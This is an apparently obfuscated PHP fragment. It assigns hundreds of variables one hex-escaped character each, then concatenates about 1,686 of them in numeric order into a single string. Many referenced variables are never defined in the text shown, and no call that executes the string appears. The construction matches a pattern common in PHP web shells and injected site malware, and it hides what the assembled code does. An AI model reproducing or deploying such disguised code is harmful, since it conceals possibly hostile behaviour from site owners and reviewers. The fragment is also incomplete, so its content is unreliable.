$fgj470="\x65";$fgj1386="\x20";$fgj345="\x2b";$fgj679="\x73";$fgj568="\x20";$fgj412="\x7d";$fgj1491="\x6f";$fgj1559="\x67";$fgj855="\x6f";
$fgj1504="\x20";$fgj838="\x5c";$fgj1109="\x5f";$fgj983="\x6f";$fgj458="\x6f";$fgj999="\x5f";$fgj1544="\x63";$fgj958="\x64";$fgj161="\x64";$fgj682="\x3d";
$fgj1297="\x20";
$fgj880="\x3b";$fgj116="\x2c";$fgj1166="\x20";$fgj1031="\x24";$fgj1584="\x63";$fgj145="\x61";$fgj1273="\x40";$fgj1291="\x0a";$fgj778="\x28";$fgj938="\x22";$fgj859="\x24";$fgj1528="\x72";$fgj406="\x20";
$fgj96="\x20";$fgj619="\x6f";$fgj1274="\x24";$fgj1307="\x6e";$fgj1388="\x0a";$fgj551="\x40";$fgj782="\x2b";$fgj350="\x7b";
$fgj1654="\x6e";$fgj535="\x66";$fgj1698="\x61";$fgj103="\x67";$fgj370="\x62";$fgj1573="\x6e";$fgj1017="\x63";
$fgj1587="\x20";
$fgj620="\x72";
$fgj1347="\x67";
$fgj1556="\x69";$fgj432="\x69";$fgj139="\x75";
$fgj670="\x69";$fgj1097="\x0a";$fgj786="\x29";$fgj1="\x20";$fgj248="\x3b";$fgj198="\x20";$fgj519="\x66";$fgj1254="\x3b";$fgj142="\x6d";$fgj283="\x65";
$fgj1112="\x74";$fgj1458="\x23";$fgj1304="\x74";
$fgj297="\x64";$fgj45="\x30";
$fgj546="\x70";$fgj1037="\x61";$fgj315="\x28";$fgj1638="\x5f";$fgj92="\x6f";$fgj642="\x69";$fgj600="\x09";$fgj1488="\x73";$fgj1199="\x20";$fgj1210="\x74";$fgj1237="\x6a";$fgj1438="\x09";$fgj680="\x25";$fgj730="\x72";$fgj924="\x09";
$fgj708="\x20";
$fgj115="\x64";$fgj1634="\x24";$fgj762="\x28";$fgj1302="\x5f";$fgj364="\x70";$fgj1603="\x0a";$fgj362="\x72";$fgj1560="\x72";$fgj1268="\x6a";$fgj1043="\x3b";$fgj804="\x6c";$fgj1646="\x65";$fgj170="\x74";$fgj1024="\x20";
$fgj437="\x72";$fgj529="\x65";$fgj258="\x64";$fgj1173="\x20";$fgj162="\x65";$fgj949="\x20";
$fgj1545="\x6f";$fgj17="\x20";$fgj798="\x0a";$fgj480="\x20";$fgj967="\x29";$fgj718="\x24";$fgj104="\x68";$fgj728="\x73";$fgj1296="\x62";$fgj1108="\x72";$fgj1239="\x20";$fgj1390="\x09";
$fgj1253="\x5d";$fgj962="\x29";$fgj636="\x20";$fgj868="\x69";$fgj843="\x72";$fgj244="\x69";$fgj1299="\x61";$fgj849="\x3d";$fgj1555="\x20";$fgj631="\x24";$fgj250="\x0a";$fgj221="\x72";
$fgj1687="\x22";$fgj1157="\x69";$fgj1392="\x73";$fgj539="\x28";$fgj1508="\x70";$fgj1293="\x0a";$fgj1700="\x69";$fgj1601="\x29";$fgj1035="\x5f";
$fgj314="\x20";$fgj111="\x65";$fgj1381="\x2b";$fgj873="\x23";$fgj1184="\x3d";$fgj891="\x09";
$fgj803="\x61";$fgj1101="\x62";$fgj995="\x24";
$fgj132="\x72";
$fgj154="\x09";
$fgj396="\x20";
$fgj1050="\x64";$fgj1564="\x6e";$fgj405="\x2c";
$fgj399="\x6e";$fgj811="\x20";$fgj471="\x64";$fgj295="\x69";
$fgj1160="\x20";$fgj943="\x28";$fgj864="\x30";$fgj1193="\x64";$fgj1328="\x64";$fgj1244="\x61";$fgj1064="\x24";$fgj24="\x6f";$fgj1153="\x6d";$fgj1326="\x61";$fgj205="\x6e";$fgj953="\x74";$fgj640="\x63";$fgj1316="\x24";$fgj674="\x28";$fgj1038="\x6d";$fgj366="\x2c";$fgj173="\x09";$fgj1614="\x0a";$fgj812="\x65";
$fgj1409="\x28";$fgj878="\x70";$fgj1213="\x66";$fgj1096="\x0a";$fgj1074="\x22";$fgj1305="\x72";$fgj822="\x69";$fgj879="\x74";$fgj832="\x65";$fgj1261="\x32";$fgj1445="\x20";$fgj612="\x20";$fgj1327="\x6e";$fgj1481="\x65";$fgj1613="\x3b";$fgj444="\x65";$fgj279="\x72";$fgj358="\x20";$fgj598="\x3b";$fgj190="\x73";$fgj325="\x69";$fgj688="\x25";$fgj1475="\x76";$fgj101="\x72";$fgj226="\x74";
$fgj481="\x73";$fgj957="\x6e";
$fgj892="\x24";$fgj109="\x65";$fgj577="\x5f";$fgj1709="\x20";$fgj424="\x6d";$fgj189="\x40";$fgj128="\x72";$fgj584="\x20";$fgj898="\x20";$fgj296="\x6c";
$fgj968="\x20";$fgj227="\x69";$fgj68="\x63";$fgj1151="\x20";$fgj74="\x67";$fgj1510="\x74";$fgj496="\x6c";$fgj772="\x74";$fgj1494="\x6f";$fgj38="\x20";$fgj1540="\x74";$fgj1480="\x64";$fgj1360="\x28";$fgj203="\x40";$fgj902="\x22";$fgj1616="\x70";$fgj779="\x32";$fgj1078="\x0a";$fgj1676="\x65";$fgj923="\x09";
$fgj1417="\x6e";$fgj1172="\x29";$fgj489="\x6e";$fgj381="\x20";$fgj365="\x74";$fgj1095="\x7d";$fgj193="\x69";
$fgj1583="\x6e";$fgj677="\x24";$fgj833="\x20";
$fgj379="\x65";$fgj30="\x67";$fgj49="\x65";$fgj1608="\x74";$fgj648="\x2b";
$fgj126="\x73";$fgj1440="\x65";$fgj395="\x68";$fgj230="\x28";$fgj131="\x65";
$fgj1346="\x6e";$fgj77="\x65";
$fgj1627="\x61";$fgj156="\x79";$fgj1317="\x6c";$fgj1486="\x61";$fgj1679="\x3b";
$fgj427="\x65";$fgj1444="\x6e";$fgj40="\x43";$fgj1319="\x3d";$fgj1591="\x61";$fgj536="\x66";
$fgj702="\x5f";$fgj793="\x3b";$fgj1618="\x6e";$fgj777="\x64";$fgj580="\x6d";$fgj47="\x20";$fgj1286="\x0a";$fgj1171="\x3b";$fgj540="\x5c";$fgj1490="\x79";$fgj1642="\x65";
$fgj392="\x70";$fgj1353="\x3b";$fgj633="\x20";$fgj806="\x75";$fgj1473="\x73";$fgj910="\x6e";$fgj461="\x77";$fgj738="\x29";$fgj332="\x67";$fgj894="\x63";$fgj348="\x29";$fgj44="\x30";$fgj181="\x20";$fgj1484="\x6d";$fgj917="\x24";$fgj1325="\x72";$fgj1398="\x20";
$fgj774="\x72";$fgj1483="\x20";$fgj760="\x66";$fgj1450="\x69";$fgj556="\x78";
$fgj1058="\x76";$fgj1542="\x65";$fgj1294="\x73";$fgj349="\x20";$fgj1530="\x73";$fgj530="\x73";$fgj1229="\x61";
$fgj270="\x66";$fgj187="\x79";$fgj141="\x20";$fgj756="\x6e";$fgj918="\x69";$fgj1558="\x20";$fgj1228="\x24";$fgj286="\x20";$fgj1130="\x28";$fgj224="\x64";
$fgj127="\x20";$fgj1407="\x74";$fgj426="\x7a";$fgj1568="\x78";
$fgj1478="\x63";$fgj694="\x3b";$fgj118="\x61";
$fgj931="\x20";$fgj1321="\x69";$fgj616="\x0a";$fgj1251="\x24";$fgj1312="\x09";$fgj932="\x2e";$fgj545="\x69";$fgj516="\x72";$fgj1150="\x72";
$fgj1227="\x40";$fgj836="\x20";
$fgj608="\x64";$fgj1514="\x20";$fgj591="\x74";$fgj988="\x3d";
$fgj867="\x24";$fgj1232="\x24";$fgj1425="\x32";
$fgj1397="\x67";$fgj587="\x6e";$fgj=$fgj0.
$fgj1.
$fgj2.
$fgj3.$fgj4.$fgj5.$fgj6.$fgj7.$fgj8.$fgj9.$fgj10.
$fgj11.$fgj12.$fgj13.$fgj14.$fgj15.
$fgj16.$fgj17.$fgj18.$fgj19.$fgj20.
$fgj21.
$fgj22.$fgj23.$fgj24.
$fgj25.$fgj26.$fgj27.$fgj28.$fgj29.$fgj30.
$fgj31.$fgj32.$fgj33.$fgj34.$fgj35.$fgj36.$fgj37.$fgj38.$fgj39.$fgj40.$fgj41.$fgj42.$fgj43.$fgj44.
$fgj45.
$fgj46.$fgj47.$fgj48.$fgj49.$fgj50.$fgj51.$fgj52.
$fgj53.$fgj54.$fgj55.$fgj56.$fgj57.$fgj58.$fgj59.$fgj60.
$fgj61.$fgj62.$fgj63.$fgj64.
$fgj65.
$fgj66.$fgj67.$fgj68.$fgj69.$fgj70.$fgj71.$fgj72.$fgj73.$fgj74.
$fgj75.$fgj76.$fgj77.$fgj78.
$fgj79.$fgj80.$fgj81.
$fgj82.$fgj83.$fgj84.
$fgj85.
$fgj86.$fgj87.$fgj88.
$fgj89.$fgj90.
$fgj91.
$fgj92.
$fgj93.$fgj94.$fgj95.$fgj96.$fgj97.$fgj98.$fgj99.$fgj100.$fgj101.$fgj102.$fgj103.$fgj104.$fgj105.$fgj106.$fgj107.$fgj108.$fgj109.$fgj110.$fgj111.$fgj112.$fgj113.$fgj114.$fgj115.$fgj116.$fgj117.$fgj118.$fgj119.
$fgj120.
$fgj121.
$fgj122.$fgj123.$fgj124.$fgj125.$fgj126.
$fgj127.$fgj128.$fgj129.$fgj130.$fgj131.
$fgj132.$fgj133.$fgj134.$fgj135.$fgj136.$fgj137.$fgj138.$fgj139.$fgj140.
$fgj141.$fgj142.$fgj143.$fgj144.$fgj145.$fgj146.$fgj147.$fgj148.$fgj149.$fgj150.
$fgj151.$fgj152.
$fgj153.$fgj154.$fgj155.$fgj156.$fgj157.$fgj158.$fgj159.$fgj160.$fgj161.$fgj162.$fgj163.$fgj164.$fgj165.$fgj166.
$fgj167.$fgj168.
$fgj169.$fgj170.
$fgj171.$fgj172.$fgj173.$fgj174.$fgj175.$fgj176.
$fgj177.$fgj178.$fgj179.$fgj180.$fgj181.$fgj182.
$fgj183.$fgj184.$fgj185.$fgj186.$fgj187.$fgj188.$fgj189.$fgj190.$fgj191.$fgj192.$fgj193.$fgj194.$fgj195.$fgj196.$fgj197.$fgj198.$fgj199.$fgj200.
$fgj201.$fgj202.
$fgj203.$fgj204.$fgj205.$fgj206.$fgj207.$fgj208.$fgj209.
$fgj210.
$fgj211.$fgj212.$fgj213.$fgj214.$fgj215.$fgj216.
$fgj217.$fgj218.$fgj219.$fgj220.$fgj221.$fgj222.$fgj223.$fgj224.$fgj225.$fgj226.
$fgj227.
$fgj228.$fgj229.$fgj230.$fgj231.$fgj232.$fgj233.$fgj234.$fgj235.$fgj236.$fgj237.
$fgj238.$fgj239.$fgj240.$fgj241.$fgj242.$fgj243.$fgj244.$fgj245.$fgj246.$fgj247.
$fgj248.$fgj249.$fgj250.$fgj251.$fgj252.
$fgj253.$fgj254.$fgj255.$fgj256.
$fgj257.$fgj258.
$fgj259.
$fgj260.$fgj261.$fgj262.$fgj263.$fgj264.
$fgj265.
$fgj266.$fgj267.$fgj268.$fgj269.$fgj270.
$fgj271.$fgj272.
$fgj273.$fgj274.$fgj275.$fgj276.$fgj277.$fgj278.$fgj279.$fgj280.$fgj281.$fgj282.
$fgj283.$fgj284.$fgj285.
$fgj286.$fgj287.$fgj288.$fgj289.$fgj290.
$fgj291.$fgj292.$fgj293.$fgj294.$fgj295.$fgj296.$fgj297.$fgj298.$fgj299.$fgj300.$fgj301.$fgj302.$fgj303.$fgj304.$fgj305.$fgj306.$fgj307.$fgj308.$fgj309.$fgj310.$fgj311.
$fgj312.$fgj313.$fgj314.$fgj315.$fgj316.$fgj317.$fgj318.$fgj319.$fgj320.$fgj321.$fgj322.
$fgj323.$fgj324.$fgj325.
$fgj326.$fgj327.$fgj328.$fgj329.$fgj330.
$fgj331.$fgj332.$fgj333.$fgj334.$fgj335.$fgj336.
$fgj337.$fgj338.$fgj339.$fgj340.
$fgj341.$fgj342.$fgj343.$fgj344.$fgj345.$fgj346.$fgj347.$fgj348.$fgj349.$fgj350.
$fgj351.$fgj352.$fgj353.$fgj354.$fgj355.$fgj356.$fgj357.$fgj358.$fgj359.$fgj360.
$fgj361.$fgj362.$fgj363.$fgj364.$fgj365.$fgj366.$fgj367.$fgj368.$fgj369.$fgj370.$fgj371.$fgj372.
$fgj373.$fgj374.$fgj375.$fgj376.$fgj377.$fgj378.
$fgj379.$fgj380.$fgj381.$fgj382.
$fgj383.$fgj384.
$fgj385.
$fgj386.
$fgj387.$fgj388.$fgj389.$fgj390.
$fgj391.$fgj392.$fgj393.$fgj394.$fgj395.$fgj396.$fgj397.$fgj398.$fgj399.
$fgj400.$fgj401.
$fgj402.$fgj403.$fgj404.$fgj405.$fgj406.$fgj407.
$fgj408.$fgj409.$fgj410.$fgj411.
$fgj412.
$fgj413.$fgj414.
$fgj415.$fgj416.$fgj417.$fgj418.
$fgj419.$fgj420.
$fgj421.$fgj422.$fgj423.$fgj424.$fgj425.$fgj426.$fgj427.$fgj428.$fgj429.
$fgj430.$fgj431.$fgj432.
$fgj433.$fgj434.$fgj435.$fgj436.$fgj437.
$fgj438.$fgj439.$fgj440.$fgj441.
$fgj442.$fgj443.$fgj444.
$fgj445.$fgj446.$fgj447.$fgj448.
$fgj449.$fgj450.
$fgj451.$fgj452.$fgj453.$fgj454.$fgj455.$fgj456.$fgj457.$fgj458.$fgj459.$fgj460.$fgj461.$fgj462.
$fgj463.$fgj464.$fgj465.$fgj466.$fgj467.$fgj468.$fgj469.$fgj470.$fgj471.
$fgj472.$fgj473.$fgj474.$fgj475.$fgj476.
$fgj477.
$fgj478.$fgj479.$fgj480.
$fgj481.$fgj482.$fgj483.$fgj484.$fgj485.$fgj486.$fgj487.$fgj488.$fgj489.$fgj490.$fgj491.$fgj492.$fgj493.$fgj494.$fgj495.$fgj496.$fgj497.$fgj498.$fgj499.$fgj500.
$fgj501.$fgj502.$fgj503.$fgj504.$fgj505.$fgj506.$fgj507.$fgj508.$fgj509.$fgj510.$fgj511.$fgj512.$fgj513.$fgj514.
$fgj515.$fgj516.$fgj517.$fgj518.$fgj519.$fgj520.$fgj521.$fgj522.$fgj523.$fgj524.$fgj525.
$fgj526.$fgj527.$fgj528.
$fgj529.
$fgj530.$fgj531.$fgj532.$fgj533.$fgj534.$fgj535.$fgj536.$fgj537.$fgj538.$fgj539.$fgj540.$fgj541.$fgj542.$fgj543.$fgj544.$fgj545.$fgj546.$fgj547.$fgj548.$fgj549.$fgj550.
$fgj551.$fgj552.$fgj553.$fgj554.$fgj555.$fgj556.$fgj557.$fgj558.$fgj559.$fgj560.
$fgj561.$fgj562.
$fgj563.$fgj564.$fgj565.$fgj566.
$fgj567.$fgj568.$fgj569.$fgj570.$fgj571.$fgj572.$fgj573.$fgj574.$fgj575.
$fgj576.
$fgj577.$fgj578.$fgj579.
$fgj580.$fgj581.$fgj582.$fgj583.$fgj584.
$fgj585.$fgj586.
$fgj587.$fgj588.
$fgj589.$fgj590.
$fgj591.$fgj592.$fgj593.$fgj594.$fgj595.$fgj596.$fgj597.
$fgj598.$fgj599.$fgj600.
$fgj601.
$fgj602.$fgj603.$fgj604.
$fgj605.$fgj606.$fgj607.$fgj608.
$fgj609.$fgj610.$fgj611.$fgj612.
$fgj613.$fgj614.$fgj615.$fgj616.$fgj617.$fgj618.$fgj619.$fgj620.$fgj621.$fgj622.$fgj623.$fgj624.$fgj625.$fgj626.$fgj627.$fgj628.$fgj629.$fgj630.$fgj631.$fgj632.$fgj633.$fgj634.$fgj635.$fgj636.
$fgj637.
$fgj638.$fgj639.
$fgj640.
$fgj641.$fgj642.
$fgj643.$fgj644.
$fgj645.$fgj646.
$fgj647.$fgj648.$fgj649.$fgj650.$fgj651.$fgj652.$fgj653.$fgj654.$fgj655.
$fgj656.$fgj657.$fgj658.$fgj659.$fgj660.
$fgj661.$fgj662.$fgj663.$fgj664.$fgj665.$fgj666.$fgj667.$fgj668.$fgj669.$fgj670.$fgj671.$fgj672.$fgj673.$fgj674.$fgj675.$fgj676.$fgj677.$fgj678.$fgj679.$fgj680.$fgj681.
$fgj682.
$fgj683.$fgj684.
$fgj685.$fgj686.$fgj687.$fgj688.$fgj689.$fgj690.$fgj691.$fgj692.$fgj693.$fgj694.$fgj695.$fgj696.$fgj697.$fgj698.$fgj699.$fgj700.
$fgj701.$fgj702.
$fgj703.$fgj704.$fgj705.$fgj706.$fgj707.$fgj708.$fgj709.$fgj710.$fgj711.$fgj712.$fgj713.$fgj714.
$fgj715.$fgj716.
$fgj717.$fgj718.$fgj719.$fgj720.
$fgj721.
$fgj722.$fgj723.$fgj724.$fgj725.$fgj726.
$fgj727.$fgj728.$fgj729.$fgj730.
$fgj731.$fgj732.
$fgj733.$fgj734.$fgj735.$fgj736.
$fgj737.$fgj738.$fgj739.$fgj740.$fgj741.$fgj742.
$fgj743.$fgj744.$fgj745.
$fgj746.$fgj747.$fgj748.$fgj749.$fgj750.$fgj751.$fgj752.$fgj753.$fgj754.$fgj755.$fgj756.$fgj757.$fgj758.$fgj759.$fgj760.$fgj761.$fgj762.$fgj763.$fgj764.$fgj765.$fgj766.$fgj767.$fgj768.
$fgj769.$fgj770.
$fgj771.$fgj772.$fgj773.$fgj774.
$fgj775.$fgj776.$fgj777.$fgj778.$fgj779.$fgj780.
$fgj781.$fgj782.$fgj783.$fgj784.$fgj785.$fgj786.$fgj787.$fgj788.$fgj789.$fgj790.$fgj791.$fgj792.
$fgj793.$fgj794.$fgj795.$fgj796.$fgj797.$fgj798.$fgj799.
$fgj800.
$fgj801.$fgj802.$fgj803.$fgj804.
$fgj805.$fgj806.$fgj807.$fgj808.$fgj809.$fgj810.
$fgj811.$fgj812.$fgj813.$fgj814.$fgj815.$fgj816.$fgj817.$fgj818.$fgj819.$fgj820.$fgj821.$fgj822.$fgj823.$fgj824.
$fgj825.$fgj826.$fgj827.$fgj828.$fgj829.$fgj830.$fgj831.$fgj832.$fgj833.$fgj834.$fgj835.$fgj836.$fgj837.$fgj838.$fgj839.$fgj840.
$fgj841.$fgj842.$fgj843.$fgj844.$fgj845.$fgj846.
$fgj847.$fgj848.$fgj849.$fgj850.
$fgj851.$fgj852.$fgj853.$fgj854.$fgj855.$fgj856.$fgj857.$fgj858.$fgj859.$fgj860.
$fgj861.$fgj862.$fgj863.$fgj864.
$fgj865.$fgj866.
$fgj867.$fgj868.$fgj869.$fgj870.$fgj871.$fgj872.$fgj873.$fgj874.$fgj875.$fgj876.$fgj877.$fgj878.$fgj879.$fgj880.$fgj881.$fgj882.$fgj883.$fgj884.$fgj885.$fgj886.$fgj887.$fgj888.$fgj889.
$fgj890.$fgj891.$fgj892.$fgj893.$fgj894.
$fgj895.$fgj896.$fgj897.$fgj898.$fgj899.$fgj900.$fgj901.$fgj902.
$fgj903.
$fgj904.$fgj905.$fgj906.$fgj907.$fgj908.$fgj909.
$fgj910.$fgj911.$fgj912.$fgj913.$fgj914.$fgj915.$fgj916.$fgj917.$fgj918.$fgj919.$fgj920.
$fgj921.$fgj922.$fgj923.$fgj924.$fgj925.$fgj926.$fgj927.$fgj928.$fgj929.$fgj930.
$fgj931.$fgj932.
$fgj933.$fgj934.$fgj935.$fgj936.$fgj937.$fgj938.$fgj939.$fgj940.$fgj941.$fgj942.$fgj943.$fgj944.$fgj945.
$fgj946.$fgj947.$fgj948.
$fgj949.$fgj950.$fgj951.$fgj952.
$fgj953.$fgj954.$fgj955.$fgj956.$fgj957.$fgj958.$fgj959.$fgj960.$fgj961.$fgj962.$fgj963.$fgj964.$fgj965.$fgj966.$fgj967.$fgj968.$fgj969.$fgj970.$fgj971.$fgj972.$fgj973.$fgj974.$fgj975.
$fgj976.
$fgj977.$fgj978.$fgj979.$fgj980.$fgj981.$fgj982.
$fgj983.$fgj984.$fgj985.
$fgj986.$fgj987.$fgj988.$fgj989.$fgj990.$fgj991.$fgj992.$fgj993.$fgj994.$fgj995.$fgj996.
$fgj997.$fgj998.$fgj999.
$fgj1000.
$fgj1001.$fgj1002.$fgj1003.$fgj1004.$fgj1005.$fgj1006.$fgj1007.
$fgj1008.
$fgj1009.$fgj1010.$fgj1011.
$fgj1012.
$fgj1013.$fgj1014.
$fgj1015.$fgj1016.$fgj1017.
$fgj1018.$fgj1019.$fgj1020.
$fgj1021.$fgj1022.$fgj1023.$fgj1024.
$fgj1025.$fgj1026.
$fgj1027.$fgj1028.$fgj1029.$fgj1030.$fgj1031.$fgj1032.$fgj1033.$fgj1034.
$fgj1035.
$fgj1036.$fgj1037.$fgj1038.$fgj1039.$fgj1040.
$fgj1041.$fgj1042.$fgj1043.$fgj1044.
$fgj1045.$fgj1046.$fgj1047.$fgj1048.$fgj1049.$fgj1050.$fgj1051.$fgj1052.$fgj1053.$fgj1054.$fgj1055.$fgj1056.
$fgj1057.$fgj1058.$fgj1059.$fgj1060.$fgj1061.$fgj1062.
$fgj1063.$fgj1064.$fgj1065.$fgj1066.
$fgj1067.$fgj1068.$fgj1069.$fgj1070.$fgj1071.$fgj1072.
$fgj1073.$fgj1074.$fgj1075.$fgj1076.$fgj1077.$fgj1078.$fgj1079.$fgj1080.
$fgj1081.$fgj1082.$fgj1083.$fgj1084.
$fgj1085.$fgj1086.
$fgj1087.$fgj1088.$fgj1089.$fgj1090.$fgj1091.$fgj1092.
$fgj1093.$fgj1094.$fgj1095.
$fgj1096.$fgj1097.$fgj1098.
$fgj1099.$fgj1100.$fgj1101.$fgj1102.$fgj1103.$fgj1104.$fgj1105.
$fgj1106.$fgj1107.$fgj1108.$fgj1109.$fgj1110.
$fgj1111.$fgj1112.$fgj1113.$fgj1114.$fgj1115.$fgj1116.$fgj1117.$fgj1118.$fgj1119.$fgj1120.$fgj1121.$fgj1122.
$fgj1123.$fgj1124.$fgj1125.$fgj1126.$fgj1127.$fgj1128.$fgj1129.$fgj1130.$fgj1131.$fgj1132.$fgj1133.$fgj1134.$fgj1135.$fgj1136.
$fgj1137.$fgj1138.$fgj1139.$fgj1140.$fgj1141.$fgj1142.$fgj1143.$fgj1144.$fgj1145.$fgj1146.$fgj1147.$fgj1148.$fgj1149.$fgj1150.$fgj1151.$fgj1152.$fgj1153.$fgj1154.$fgj1155.$fgj1156.$fgj1157.
$fgj1158.$fgj1159.$fgj1160.
$fgj1161.
$fgj1162.
$fgj1163.$fgj1164.$fgj1165.$fgj1166.$fgj1167.$fgj1168.$fgj1169.$fgj1170.
$fgj1171.$fgj1172.$fgj1173.$fgj1174.$fgj1175.$fgj1176.
$fgj1177.
$fgj1178.$fgj1179.$fgj1180.$fgj1181.$fgj1182.
$fgj1183.$fgj1184.$fgj1185.$fgj1186.$fgj1187.$fgj1188.
$fgj1189.$fgj1190.$fgj1191.$fgj1192.$fgj1193.$fgj1194.$fgj1195.$fgj1196.
$fgj1197.$fgj1198.$fgj1199.$fgj1200.
$fgj1201.$fgj1202.$fgj1203.$fgj1204.$fgj1205.$fgj1206.
$fgj1207.$fgj1208.
$fgj1209.$fgj1210.$fgj1211.$fgj1212.
$fgj1213.$fgj1214.$fgj1215.
$fgj1216.$fgj1217.$fgj1218.
$fgj1219.
$fgj1220.$fgj1221.$fgj1222.$fgj1223.$fgj1224.$fgj1225.$fgj1226.$fgj1227.$fgj1228.$fgj1229.$fgj1230.$fgj1231.$fgj1232.$fgj1233.$fgj1234.$fgj1235.$fgj1236.$fgj1237.
$fgj1238.$fgj1239.$fgj1240.
$fgj1241.$fgj1242.$fgj1243.$fgj1244.$fgj1245.$fgj1246.$fgj1247.$fgj1248.
$fgj1249.$fgj1250.$fgj1251.$fgj1252.$fgj1253.$fgj1254.
$fgj1255.$fgj1256.
$fgj1257.$fgj1258.$fgj1259.
$fgj1260.$fgj1261.$fgj1262.$fgj1263.$fgj1264.
$fgj1265.$fgj1266.$fgj1267.$fgj1268.$fgj1269.$fgj1270.$fgj1271.$fgj1272.$fgj1273.
$fgj1274.$fgj1275.$fgj1276.
$fgj1277.$fgj1278.$fgj1279.$fgj1280.$fgj1281.$fgj1282.$fgj1283.$fgj1284.$fgj1285.$fgj1286.$fgj1287.$fgj1288.$fgj1289.$fgj1290.$fgj1291.$fgj1292.
$fgj1293.$fgj1294.$fgj1295.$fgj1296.$fgj1297.$fgj1298.$fgj1299.$fgj1300.
$fgj1301.$fgj1302.$fgj1303.$fgj1304.$fgj1305.$fgj1306.$fgj1307.$fgj1308.$fgj1309.$fgj1310.$fgj1311.$fgj1312.$fgj1313.$fgj1314.$fgj1315.$fgj1316.
$fgj1317.$fgj1318.$fgj1319.$fgj1320.$fgj1321.$fgj1322.$fgj1323.$fgj1324.$fgj1325.$fgj1326.
$fgj1327.$fgj1328.$fgj1329.
$fgj1330.$fgj1331.$fgj1332.
$fgj1333.
$fgj1334.$fgj1335.$fgj1336.$fgj1337.$fgj1338.$fgj1339.$fgj1340.$fgj1341.$fgj1342.$fgj1343.$fgj1344.$fgj1345.
$fgj1346.
$fgj1347.$fgj1348.$fgj1349.$fgj1350.
$fgj1351.$fgj1352.$fgj1353.$fgj1354.$fgj1355.
$fgj1356.$fgj1357.$fgj1358.$fgj1359.$fgj1360.$fgj1361.$fgj1362.$fgj1363.$fgj1364.$fgj1365.
$fgj1366.
$fgj1367.$fgj1368.
$fgj1369.$fgj1370.$fgj1371.$fgj1372.$fgj1373.$fgj1374.
$fgj1375.$fgj1376.$fgj1377.
$fgj1378.$fgj1379.$fgj1380.$fgj1381.$fgj1382.$fgj1383.$fgj1384.$fgj1385.$fgj1386.$fgj1387.$fgj1388.$fgj1389.$fgj1390.$fgj1391.$fgj1392.$fgj1393.$fgj1394.
$fgj1395.
$fgj1396.$fgj1397.
$fgj1398.$fgj1399.$fgj1400.
$fgj1401.$fgj1402.$fgj1403.$fgj1404.$fgj1405.$fgj1406.$fgj1407.$fgj1408.
$fgj1409.$fgj1410.$fgj1411.$fgj1412.
$fgj1413.$fgj1414.$fgj1415.$fgj1416.
$fgj1417.$fgj1418.$fgj1419.$fgj1420.$fgj1421.$fgj1422.$fgj1423.$fgj1424.$fgj1425.$fgj1426.$fgj1427.$fgj1428.
$fgj1429.$fgj1430.$fgj1431.
$fgj1432.$fgj1433.$fgj1434.$fgj1435.$fgj1436.
$fgj1437.$fgj1438.$fgj1439.$fgj1440.$fgj1441.$fgj1442.
$fgj1443.$fgj1444.$fgj1445.$fgj1446.$fgj1447.$fgj1448.$fgj1449.$fgj1450.
$fgj1451.$fgj1452.$fgj1453.$fgj1454.$fgj1455.
$fgj1456.$fgj1457.$fgj1458.$fgj1459.$fgj1460.$fgj1461.$fgj1462.$fgj1463.$fgj1464.$fgj1465.$fgj1466.$fgj1467.$fgj1468.$fgj1469.$fgj1470.$fgj1471.$fgj1472.
$fgj1473.$fgj1474.$fgj1475.
$fgj1476.$fgj1477.$fgj1478.$fgj1479.$fgj1480.$fgj1481.$fgj1482.$fgj1483.$fgj1484.
$fgj1485.$fgj1486.$fgj1487.$fgj1488.$fgj1489.$fgj1490.$fgj1491.$fgj1492.$fgj1493.$fgj1494.$fgj1495.$fgj1496.$fgj1497.$fgj1498.$fgj1499.$fgj1500.
$fgj1501.$fgj1502.$fgj1503.$fgj1504.
$fgj1505.$fgj1506.$fgj1507.$fgj1508.$fgj1509.$fgj1510.$fgj1511.$fgj1512.
$fgj1513.$fgj1514.$fgj1515.$fgj1516.$fgj1517.$fgj1518.$fgj1519.$fgj1520.
$fgj1521.$fgj1522.$fgj1523.$fgj1524.$fgj1525.$fgj1526.$fgj1527.$fgj1528.
$fgj1529.$fgj1530.$fgj1531.$fgj1532.$fgj1533.
$fgj1534.$fgj1535.$fgj1536.
$fgj1537.$fgj1538.$fgj1539.$fgj1540.
$fgj1541.$fgj1542.
$fgj1543.$fgj1544.$fgj1545.
$fgj1546.$fgj1547.
$fgj1548.
$fgj1549.$fgj1550.$fgj1551.$fgj1552.$fgj1553.$fgj1554.
$fgj1555.$fgj1556.$fgj1557.$fgj1558.$fgj1559.$fgj1560.$fgj1561.$fgj1562.$fgj1563.$fgj1564.$fgj1565.$fgj1566.
$fgj1567.$fgj1568.$fgj1569.$fgj1570.$fgj1571.$fgj1572.$fgj1573.$fgj1574.
$fgj1575.
$fgj1576.$fgj1577.$fgj1578.
$fgj1579.$fgj1580.$fgj1581.$fgj1582.$fgj1583.$fgj1584.
$fgj1585.$fgj1586.$fgj1587.$fgj1588.$fgj1589.$fgj1590.$fgj1591.$fgj1592.
$fgj1593.$fgj1594.
$fgj1595.$fgj1596.$fgj1597.$fgj1598.$fgj1599.$fgj1600.$fgj1601.$fgj1602.$fgj1603.$fgj1604.$fgj1605.$fgj1606.$fgj1607.$fgj1608.$fgj1609.$fgj1610.
$fgj1611.$fgj1612.
$fgj1613.$fgj1614.$fgj1615.
$fgj1616.$fgj1617.$fgj1618.$fgj1619.$fgj1620.
$fgj1621.$fgj1622.$fgj1623.$fgj1624.
$fgj1625.$fgj1626.$fgj1627.$fgj1628.
$fgj1629.$fgj1630.$fgj1631.$fgj1632.$fgj1633.$fgj1634.$fgj1635.$fgj1636.$fgj1637.$fgj1638.
$fgj1639.$fgj1640.
$fgj1641.$fgj1642.$fgj1643.$fgj1644.
$fgj1645.$fgj1646.$fgj1647.$fgj1648.$fgj1649.
$fgj1650.$fgj1651.
$fgj1652.
$fgj1653.$fgj1654.$fgj1655.$fgj1656.$fgj1657.$fgj1658.$fgj1659.$fgj1660.$fgj1661.$fgj1662.
$fgj1663.$fgj1664.$fgj1665.$fgj1666.$fgj1667.$fgj1668.$fgj1669.$fgj1670.$fgj1671.
$fgj1672.$fgj1673.$fgj1674.
$fgj1675.$fgj1676.
$fgj1677.$fgj1678.$fgj1679.$fgj1680.
$fgj1681.$fgj1682.$fgj1683.$fgj1684.$fgj1685.$fgj1686.
